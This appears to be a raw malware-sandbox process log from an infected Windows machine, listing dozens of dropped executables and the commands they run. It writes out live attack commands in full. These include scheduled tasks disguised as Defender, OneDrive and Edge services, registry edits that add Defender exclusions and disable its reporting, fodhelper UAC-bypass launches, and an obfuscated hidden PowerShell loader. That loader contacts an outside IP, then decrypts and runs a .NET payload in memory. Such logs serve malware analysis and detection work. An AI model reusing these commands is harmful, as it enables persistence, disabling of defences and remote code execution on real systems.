SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:3568

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo 06 & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo EkHcФRСЙ9AЛбGШ
4⤵
PID:4968

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:3976

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo бw & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Ша4iеЬZuФЯжhАч
4⤵
PID:4440

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:2736

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo ЯLЫp1ФкRVгwТЫou & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo свAоюkСЛVЯоаа
4⤵
PID:5056

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:4368

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo ъ8лзшюЖлZG & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo yMzDЪгDъq1ФLД
4⤵
PID:700

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:3532

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo а1эЛъRb6PЧXsq & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 8Аzю
4⤵
PID:920

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:1104

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo BOР5Т & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 9тКВЦDмO4БQДттlЖp
4⤵
PID:376

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:312

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo ьDв7cэ4У & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 6N3EПIАxЛЬNТY
4⤵
PID:344

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:4008

C:\ProgramData\Dllhost\dllhost.exe
"C:\ProgramData\Dllhost\dllhost.exe"
4⤵
PID:756

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
5⤵
PID:6008

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
5⤵
PID:4916

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
5⤵
PID:6648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3828 -s 540
3⤵
- Program crash
PID:4620

C:\Users\Admin\AppData\Local\Temp\a\newbuild.exe
"C:\Users\Admin\AppData\Local\Temp\a\newbuild.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1100

C:\ProgramData\23244914795465595612.exe
"C:\ProgramData\23244914795465595612.exe"
3⤵
PID:1228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $typiconBooties = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $elidesDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDU5MzQ=')); $agentsTypicon = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('M2EyNWE=')); $elidesBooties = new-object System.Net.Sockets.TcpClient; $elidesBooties.Connect($typiconBooties, [int]$elidesDiggers); $moniasBecram = $elidesBooties.GetStream(); $elidesBooties.SendTimeout = 300000; $elidesBooties.ReceiveTimeout = 300000; $lingasElides = [System.Text.StringBuilder]::new(); $lingasElides.AppendLine('GET /' + $agentsTypicon); $lingasElides.AppendLine('Host: ' + $typiconBooties); $lingasElides.AppendLine(); $bootiesMonias = [System.Text.Encoding]::ASCII.GetBytes($lingasElides.ToString()); $moniasBecram.Write($bootiesMonias, 0, $bootiesMonias.Length); $moniasAgents = New-Object System.IO.MemoryStream; $moniasBecram.CopyTo($moniasAgents); $moniasBecram.Dispose(); $elidesBooties.Dispose(); $moniasAgents.Position = 0; $bootiesDiggers = $moniasAgents.ToArray(); $moniasAgents.Dispose(); $lingasAgents = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers).IndexOf('`r`n`r`n')+1; $lingasTypicon = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers[$lingasAgents..($bootiesDiggers.Length-1)]); $lingasTypicon = [System.Convert]::FromBase64String($lingasTypicon); $diggersCuittle = New-Object System.Security.Cryptography.AesManaged; $diggersCuittle.Mode = [System.Security.Cryptography.CipherMode]::CBC; $diggersCuittle.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $diggersCuittle.Key = [System.Convert]::FromBase64String('bTBxHoHlsFE1FusIuQOatttX0kgSSC4OKDkQ+IjagWQ='); $diggersCuittle.IV = [System.Convert]::FromBase64String('VB4EnrJD2qF3uAbX2nckFA=='); $typiconMonias = $diggersCuittle.CreateDecryptor(); $lingasTypicon = $typiconMonias.TransformFinalBlock($lingasTypicon, 0, $lingasTypicon.Length); $typiconMonias.Dispose(); $diggersCuittle.Dispose(); $agentsBecram = New-Object System.IO.MemoryStream(, $lingasTypicon); $cristiDiggers = New-Object System.IO.MemoryStream; $diggersMonias = New-Object System.IO.Compression.GZipStream($agentsBecram, [IO.Compression.CompressionMode]::Decompress); $diggersMonias.CopyTo($cristiDiggers); $lingasTypicon = $cristiDiggers.ToArray(); $agentsBooties = [System.Reflection.Assembly]::Load($lingasTypicon); $moniasDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZmlzdHVjYUZyYWdoYW4=')); $elidesMonias = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bGluZ2FzQ3VpdHRsZQ==')); $bootiesAgents = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Ym9vdGllc0VsaWRlcw==')); $bootiesCristi = $agentsBooties.GetType($moniasDiggers + '.' + $elidesMonias); $elidesLingas = $bootiesCristi.GetMethod($bootiesAgents); $elidesLingas.Invoke($cuittleBooties, (, [string[]] ('C:\ProgramData\23244914795465595612.exe'))); #($cuittleBooties, $cuittleBooties);
4⤵
PID:6880

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\newbuild.exe" & exit
3⤵
PID:6444

C:\Users\Admin\AppData\Local\Temp\a\134.exe
"C:\Users\Admin\AppData\Local\Temp\a\134.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4852

C:\Users\Admin\AppData\Local\Temp\a\pmZdtegi.exe
"C:\Users\Admin\AppData\Local\Temp\a\pmZdtegi.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5008

C:\Users\Admin\AppData\Local\Temp\a\pmZdtegi.exe
C:\Users\Admin\AppData\Local\Temp\a\pmZdtegi.exe
3⤵
- Executes dropped EXE
PID:2164

C:\Users\Admin\AppData\Local\Temp\a\setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
2⤵
- Executes dropped EXE
PID:4304

C:\Users\Admin\AppData\Local\Temp\7zS8F83.tmp\Install.exe
.\Install.exe
3⤵
PID:1232

C:\Users\Admin\AppData\Local\Temp\7zS9530.tmp\Install.exe
.\Install.exe /S /site_id "385104"
4⤵
PID:3376

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:1780

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:312

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:3248

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:2204

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:2036

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:4632

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:4892

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gIWOhEtSQ" /SC once /ST 00:12:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:4680

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gIWOhEtSQ"
5⤵
PID:2828

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gIWOhEtSQ"
5⤵
PID:5652

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bOkmhNOEEwkzVNcDkT" /SC once /ST 01:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dSEqUCVOPUvmFZjdC\aohSQnOiRdvcplp\hhZDApx.exe\" 5E /site_id 385104 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:5348

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bOkmhNOEEwkzVNcDkT"
5⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\a\setup (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\setup (2).exe"
2⤵
PID:3664

C:\Users\Admin\AppData\Local\Temp\a\newbuild.exe
newbuild.exe
3⤵
PID:4028

C:\ProgramData\69464627375857182844.exe
"C:\ProgramData\69464627375857182844.exe"
4⤵
PID:5488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $typiconBooties = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $elidesDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDU5MzQ=')); $agentsTypicon = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('M2EyNWE=')); $elidesBooties = new-object System.Net.Sockets.TcpClient; $elidesBooties.Connect($typiconBooties, [int]$elidesDiggers); $moniasBecram = $elidesBooties.GetStream(); $elidesBooties.SendTimeout = 300000; $elidesBooties.ReceiveTimeout = 300000; $lingasElides = [System.Text.StringBuilder]::new(); $lingasElides.AppendLine('GET /' + $agentsTypicon); $lingasElides.AppendLine('Host: ' + $typiconBooties); $lingasElides.AppendLine(); $bootiesMonias = [System.Text.Encoding]::ASCII.GetBytes($lingasElides.ToString()); $moniasBecram.Write($bootiesMonias, 0, $bootiesMonias.Length); $moniasAgents = New-Object System.IO.MemoryStream; $moniasBecram.CopyTo($moniasAgents); $moniasBecram.Dispose(); $elidesBooties.Dispose(); $moniasAgents.Position = 0; $bootiesDiggers = $moniasAgents.ToArray(); $moniasAgents.Dispose(); $lingasAgents = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers).IndexOf('`r`n`r`n')+1; $lingasTypicon = [System.Text.Encoding]::ASCII.GetString($bootiesDiggers[$lingasAgents..($bootiesDiggers.Length-1)]); $lingasTypicon = [System.Convert]::FromBase64String($lingasTypicon); $diggersCuittle = New-Object System.Security.Cryptography.AesManaged; $diggersCuittle.Mode = [System.Security.Cryptography.CipherMode]::CBC; $diggersCuittle.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $diggersCuittle.Key = [System.Convert]::FromBase64String('bTBxHoHlsFE1FusIuQOatttX0kgSSC4OKDkQ+IjagWQ='); $diggersCuittle.IV = [System.Convert]::FromBase64String('VB4EnrJD2qF3uAbX2nckFA=='); $typiconMonias = $diggersCuittle.CreateDecryptor(); $lingasTypicon = $typiconMonias.TransformFinalBlock($lingasTypicon, 0, $lingasTypicon.Length); $typiconMonias.Dispose(); $diggersCuittle.Dispose(); $agentsBecram = New-Object System.IO.MemoryStream(, $lingasTypicon); $cristiDiggers = New-Object System.IO.MemoryStream; $diggersMonias = New-Object System.IO.Compression.GZipStream($agentsBecram, [IO.Compression.CompressionMode]::Decompress); $diggersMonias.CopyTo($cristiDiggers); $lingasTypicon = $cristiDiggers.ToArray(); $agentsBooties = [System.Reflection.Assembly]::Load($lingasTypicon); $moniasDiggers = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZmlzdHVjYUZyYWdoYW4=')); $elidesMonias = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bGluZ2FzQ3VpdHRsZQ==')); $bootiesAgents = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Ym9vdGllc0VsaWRlcw==')); $bootiesCristi = $agentsBooties.GetType($moniasDiggers + '.' + $elidesMonias); $elidesLingas = $bootiesCristi.GetMethod($bootiesAgents); $elidesLingas.Invoke($cuittleBooties, (, [string[]] ('C:\ProgramData\69464627375857182844.exe'))); #($cuittleBooties, $cuittleBooties);
5⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\newbuild.exe" & exit
4⤵
PID:7488

C:\Users\Admin\AppData\Local\Temp\a\RKiDaNx.exe
"C:\Users\Admin\AppData\Local\Temp\a\RKiDaNx.exe"
2⤵
PID:356

C:\Users\Admin\AppData\Local\Temp\SETUP_3526\Engine.exe
C:\Users\Admin\AppData\Local\Temp\SETUP_3526\Engine.exe /TH_ID=_1840 /OriginExe="C:\Users\Admin\AppData\Local\Temp\a\RKiDaNx.exe"
3⤵
PID:2840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cmd < Reflection
4⤵
PID:5472

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:5884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Reflection
4⤵
PID:3944

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\a\ngrok.exe
"C:\Users\Admin\AppData\Local\Temp\a\ngrok.exe"
2⤵
PID:1848

C:\Users\Admin\AppData\Local\Temp\a\SecHorST.exe
"C:\Users\Admin\AppData\Local\Temp\a\SecHorST.exe"
2⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\is-N9QF6.tmp\SecHorST.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N9QF6.tmp\SecHorST.tmp" /SL5="$10202,1045945,780288,C:\Users\Admin\AppData\Local\Temp\a\SecHorST.exe"
3⤵
PID:4520

C:\Program Files (x86)\SecureHorizons\SecureHorizons.exe
"C:\Program Files (x86)\SecureHorizons\SecureHorizons.exe"
4⤵
PID:2144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 1480
5⤵
- Program crash
PID:5896

C:\Users\Admin\AppData\Local\Temp\a\tst2.exe
"C:\Users\Admin\AppData\Local\Temp\a\tst2.exe"
2⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\a\Build-1S.exe
"C:\Users\Admin\AppData\Local\Temp\a\Build-1S.exe"
2⤵
PID:1092

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
3⤵
PID:5764

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
3⤵
PID:5572

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
4⤵
PID:4764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
5⤵
PID:6216

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
3⤵
PID:6520

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
3⤵
PID:668

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/vhttd.exe -i
4⤵
PID:5956

C:\Users\Admin\AppData\Local\Temp\vhttd.exe
"C:\Users\Admin\AppData\Local\Temp\vhttd.exe" -i
5⤵
PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 384
6⤵
- Program crash
PID:6904

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
3⤵
PID:6556

C:\Users\Admin\AppData\Local\Temp\a\Build2.exe
"C:\Users\Admin\AppData\Local\Temp\a\Build2.exe"
2⤵
PID:560

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 560 -s 916
3⤵
- Program crash
PID:720

C:\Users\Admin\AppData\Local\Temp\a\Build1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Build1.exe"
2⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe
"C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"
3⤵
PID:916

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 916 -s 1780
4⤵
- Program crash
PID:5192

C:\Users\Admin\AppData\Local\Temp\a\shell.exe
"C:\Users\Admin\AppData\Local\Temp\a\shell.exe"
2⤵
PID:5116

C:\Users\Admin\AppData\Local\Temp\a\shell.exe
"C:\Users\Admin\AppData\Local\Temp\a\shell.exe"
3⤵
PID:1672

C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe
"C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe"
2⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\SETUP_3536\Engine.exe
C:\Users\Admin\AppData\Local\Temp\SETUP_3536\Engine.exe /TH_ID=_2152 /OriginExe="C:\Users\Admin\AppData\Local\Temp\a\koIWDRc.exe"
3⤵
PID:5408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cmd < Lat
4⤵
PID:5340

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Lat
4⤵
PID:6088

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\a\i.exe
"C:\Users\Admin\AppData\Local\Temp\a\i.exe"
2⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\a\vbc.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc.exe"
2⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\a\CCleaner.exe
"C:\Users\Admin\AppData\Local\Temp\a\CCleaner.exe"
2⤵
PID:5940

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
3⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ccsetup611.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ccsetup611.exe"
4⤵
PID:5552

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Service.exe"
4⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\a\WindowsApp6.exe
"C:\Users\Admin\AppData\Local\Temp\a\WindowsApp6.exe"
2⤵
PID:5808

C:\Users\Admin\AppData\Local\Temp\a\vbc.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc.exe"
2⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\a\vbc.exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc.exe"
3⤵
PID:6248

C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe"
2⤵
PID:5440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\vbc (2).exe"
3⤵
PID:6588

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBjeTclr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5E2.tmp"
3⤵
- Creates scheduled task(s)
PID:3204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\yBjeTclr.exe"
3⤵
PID:3212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:6436

C:\Users\Admin\AppData\Local\Temp\a\forscan.exe
"C:\Users\Admin\AppData\Local\Temp\a\forscan.exe"
2⤵
PID:4492

C:\Users\Admin\AppData\Local\Temp\applauncheerrr.exe
"C:\Users\Admin\AppData\Local\Temp\applauncheerrr.exe"
3⤵
PID:372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4492 -s 220
3⤵
- Program crash
PID:4352

C:\Users\Admin\AppData\Local\Temp\a\Had.exe
"C:\Users\Admin\AppData\Local\Temp\a\Had.exe"
2⤵
PID:1072

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:5528

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
3⤵
PID:1836

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
3⤵
PID:5396

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
3⤵
PID:5916

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
3⤵
PID:5404

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:5888

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
3⤵
PID:5360

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
3⤵
PID:5596

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:5580

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
3⤵
PID:5480

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
3⤵
PID:5864

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
3⤵
PID:5196

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
3⤵
PID:5556

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
3⤵
PID:5884

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
3⤵
PID:6012

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
3⤵
PID:3500

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
3⤵
PID:5448

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:3808

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
3⤵
PID:5296

C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
4⤵
PID:500

C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\morganzx.exe"
4⤵
PID:5668

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
3⤵
PID:3824

C:\Users\Admin\AppData\Local\Temp\a\123.exe
"C:\Users\Admin\AppData\Local\Temp\a\123.exe"
2⤵
PID:3980

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:5948

C:\Users\Admin\AppData\Local\Temp\a\vbc (3).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (3).exe"
2⤵
PID:924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 924 -s 1644
3⤵
- Program crash
PID:6204

C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"
2⤵
PID:4432

